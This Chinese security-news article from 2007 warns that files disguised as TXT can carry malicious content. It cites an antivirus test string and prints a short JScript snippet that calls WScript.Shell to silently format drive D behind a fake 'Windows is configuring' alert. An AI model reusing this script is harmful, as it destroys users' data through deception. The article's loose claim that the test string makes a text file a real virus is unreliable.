网络安全 频道

提高警惕 TXT文件也会变身系统杀手

    众所周知,TXT文件的内容无非是一些文字内容,怎么会成为系统杀手呢?其实,这些堪称杀手的TXT文件,并非真正的扩展名为TXT的文件,而是隐藏了真实扩展名的文件,而且可以用“记事本”程序打开,这也可以说是一个漏洞,正因于此,TXT文件才会成为一个凶悍无比的系统杀手。

    TXT文件怎么变杀手的?
    其实,只要在隐蔽了真实扩展名的TXT文件中,植入一段恶意的代码,TXT文件就成为了地地道道的病毒。据悉,欧洲防病毒协会曾经公开过一段病毒测试代码,以检查现有杀毒软件的防病毒能力。利用病毒测试代码测试的原理也非常简单,用户只需要在磁盘中建立一个扩展名为TXT的文件,然后将欧洲防病毒协会公开的病毒测试代码复制过去,保存TXT文件看杀毒软件是否可以查杀该文本文件。

    将病毒测试代码写入TXT文件,果真会被杀毒软件封杀吗?下面,我们不妨实际测试一下。笔者机器中安装了诺顿企业版的杀毒软件,病毒库已经更新到2007年9月9日。在磁盘中建立一个名字为IT168safe.txt的文件,将病毒测试代码复制到该文本文件中保存。这时,IT168safe.txt文件被诺顿企业版杀毒软件被病毒删除了。显然,TXT文件只要被植入恶意代码,也会变成凶悍无比的病毒。正因于此,TXT文件才会变成系统杀手。图一

保存病毒测试代码图

    除此之外,一些伪装成为TXT文件的html文件,以及一些脚本文件,也具备非常强大的破坏力。以下是一段可以执行脚本文件的内容:
    <script>
    a=new ActiveXObject("WSCript.Shell");
    a.run("format.com d:/q /autotest /u");
    alert("Windows is configuring the system. Please do not interrupt this process.");
    </script>
     既便是对脚本技术不熟悉的人也能看出来,上述代码一旦被执行,D盘将会被格式化。先将该段脚本内容保存为一个TXT文件,然后再伪装成为一个可以用浏览器打开的html文件,这个TXT的杀伤力可想而知了。
   
    只要有合适的环境,TXT也会成为一个凶悍无比的杀手。更重要的是,由于众多用户认为TXT文件不会携带病毒,更不具备什么破坏力,TXT文件对系统的破坏更隐蔽。

0
相关文章